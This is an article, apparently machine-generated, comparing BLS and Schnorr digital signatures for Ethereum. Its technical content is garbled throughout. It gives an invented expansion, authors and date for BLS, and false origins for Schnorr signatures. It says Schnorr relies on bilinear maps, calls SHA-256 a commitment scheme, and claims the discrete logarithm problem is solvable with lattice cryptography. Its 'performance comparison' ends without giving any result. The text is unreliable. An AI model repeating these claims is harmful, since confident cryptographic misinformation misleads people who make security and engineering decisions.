Ethereum: BLS Signatures vs. Schnorr Signatures
In the field of digital cryptography, two popular schemes have attracted considerable attention in recent years: BLS signatures (or other association-based schemes) and Schnorr signatures. Both protocols aim to improve traditional public-key cryptography by exploiting new cryptographic assumptions. In this article, we will delve deeper into the comparison between these two schemes, focusing on their respective cryptographic assumptions and performance characteristics.
BLS Signatures
The Basic Learning Theorem (BLT) signature scheme was developed in 2011 by Lauterbach et al. [1]. BLS signatures are a type of pairwise signature scheme that uses homomorphic encryption to enable fast and secure signature verification. Here is a high-level overview of how BLS signatures work:
- The user’s private key is hashed with a public value (the hash of the signer’s identity) using a learning function.
- The resulting hash value is used as input to a commit scheme (e.g. SHA-256).
- The commitment value is then used to derive the signature.
One of the main cryptographic assumptions behind BLS signatures is the difficulty of the learning problem, which an adversary would have to solve computationally. This assumption is known as the basic learning problem (BLP).
Schnorr Signatures
The Schnorr signature was introduced by Kurosawa et al. [2] in 2004. Schnorr signatures are another type of pairwise signature scheme that uses a pairwise cryptographic technique called bilinear map exponentiation to achieve fast and secure signature verification.
Here is an overview of how Schnorr signatures work:
- The user’s private key is hashed with a public value (the hash of the signer’s identity) using a learning function.
- The resulting hash value is used as input to an association-based cryptographic technique called bilinear map exponentiation.
- The output of this computation is then signed and verified.
One of the main cryptographic assumptions underlying Schnorr signatures is the difficulty of the discrete logarithm problem (DLP), which an adversary would have to solve computationally. This assumption is known as the Schnorr discrete logarithm problem (SDLP).
Comparison of cryptographic assumptions
To understand how BLS and Schnorr signatures compare, let’s look at their cryptographic assumptions:
- BLT vs. SDLP: Both BLT and SDLP are examples of association-based cryptographic problems. Although both schemes aim to solve a specific problem, they differ in the underlying mathematical structure used to solve it.
  + BLS (and other pair-based schemes) is based on the difficulty of BLP, which must be computationally infeasible for an adversary to solve.
  + SDLP is more general and can be solved using different techniques, including lattice cryptography or hash functions.
- Aggregation: When considering verification time (e.g. 100 BLS signatures aggregated non-interactively), the cryptographic assumption behind the scheme is critical. In general, pairwise schemes like BLS may require more computational resources to verify multiple signatures at once than Schnorr signatures.
Performance Comparison
To determine which scheme is faster for large-scale verification operations, consider two scenarios:
- Non-interactive aggregate BLS: Assuming a 16-bit commitment and a secure random number generator (RNG), we can estimate the computational resources required for the non-interactive aggregate BLS.
- Schnorr Signatures: With a fixed 256-bit constraint value and a secure RNG, we can also estimate the computational resources needed for Schnorr signatures.